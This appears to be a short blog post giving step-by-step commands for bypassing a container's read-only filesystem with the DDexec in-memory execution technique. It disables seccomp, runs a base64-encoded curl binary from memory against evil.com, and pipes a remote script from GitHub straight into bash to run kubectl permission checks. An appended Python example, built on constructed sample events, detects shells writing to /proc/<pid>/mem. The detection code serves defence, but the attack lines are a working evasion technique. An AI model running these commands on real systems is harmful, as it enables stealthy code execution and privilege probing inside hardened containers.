Bypassing the read-only filesystem (ro) restriction in containers - in-memory execution

  1. These programs should be available in the container image:
     - dd
     - bash | zsh | ash (busybox)
     - setarch | linux64 (busybox)
     - head
     - tail
     - cut
     - grep
     - od
     - readlink
     - wc
     - tr
     - base64
     - sleep
docker run --security-opt seccomp=unconfined --read-only -it ubuntu
wget https://github.com/moparisthebest/static-curl/releases/download/v7.82.0/curl-amd64 && mv curl-amd64 curl
base64 -w0 ./curl > curl.b64
ddexec()
{
# Copy and paste the ddexec.sh script as it is.
}
echo -n "<b64 encoded curl binary>" | ddexec /bin/curl evil.com
curl -sk "http://<IP>:<PORT>/<kubectl.b64>" | ddexec /bin/kubectl auth can-i --list
curl -sk "http://<IP>:<PORT>/<kubectl.b64>" | bash <(curl -sk https://raw.githubusercontent.com/arget13/DDexec/main/ddexec.sh) /bin/kubectl auth can-i --list
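
A detection-side counterpart to the steps above, as an added example that is not part of the original post or of the DDexec project: DDexec runs the supplied binary by writing into the shell's own memory through its /proc mem file, so a write-open of /proc/<pid>/mem by a shell or coreutils process is a signal that a read-only root filesystem does not remove. The event format, its field names and the sample events are constructed for illustration and are not any real sensor's schema.

```python
import json
import os
import re

# Constructed sample: simplified file-open events, one JSON object per line.
# The field names (container, exe, path, flags) are hypothetical.
SAMPLE_EVENTS = """\
{"container": "web-1", "exe": "/bin/bash", "path": "/proc/self/mem", "flags": ["O_WRONLY"]}
{"container": "web-1", "exe": "/bin/cat", "path": "/proc/self/maps", "flags": ["O_RDONLY"]}
{"container": "web-2", "exe": "/usr/bin/gdb", "path": "/proc/4121/mem", "flags": ["O_RDWR"]}
{"container": "web-3", "exe": "/bin/busybox", "path": "/proc/77/mem", "flags": ["O_RDONLY"]}
{"container": "web-3", "exe": "/bin/dd", "path": "/tmp/out.bin", "flags": ["O_WRONLY", "O_CREAT"]}
not-json garbage line
"""

# Process memory files: /proc/self/mem, /proc/<pid>/mem and per-thread variants.
MEM_PATH = re.compile(r"^/proc/(self|thread-self|\d+)(/task/\d+)?/mem$")
WRITE_FLAGS = {"O_WRONLY", "O_RDWR"}
# Shells and dd from the page's prerequisite list ("sh" added as an assumption).
SHELL_TOOLS = {"bash", "zsh", "ash", "sh", "busybox", "dd"}

def find_mem_writes(lines):
    """Return (line_no, container, tool, path, severity) for write-opens of mem files."""
    findings = []
    for n, line in enumerate(lines.splitlines(), 1):
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed records instead of aborting the scan
        if not isinstance(ev, dict):
            continue
        path = os.path.normpath(ev.get("path", ""))  # collapses ../ and // tricks
        if not MEM_PATH.match(path) or not WRITE_FLAGS & set(ev.get("flags", [])):
            continue
        tool = os.path.basename(ev.get("exe", ""))
        # A shell or dd writing process memory is rarely legitimate; a debugger may be.
        severity = "high" if tool in SHELL_TOOLS else "review"
        findings.append((n, ev.get("container"), tool, path, severity))
    return findings

if __name__ == "__main__":
    for finding in find_mem_writes(SAMPLE_EVENTS):
        print(finding)
```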

n00🔑

Computer Security Enthusiast. Tries to understand how computers work. Would love to hear your suggestions and feedback. https://www.linkedin.com/in/pswalia2u/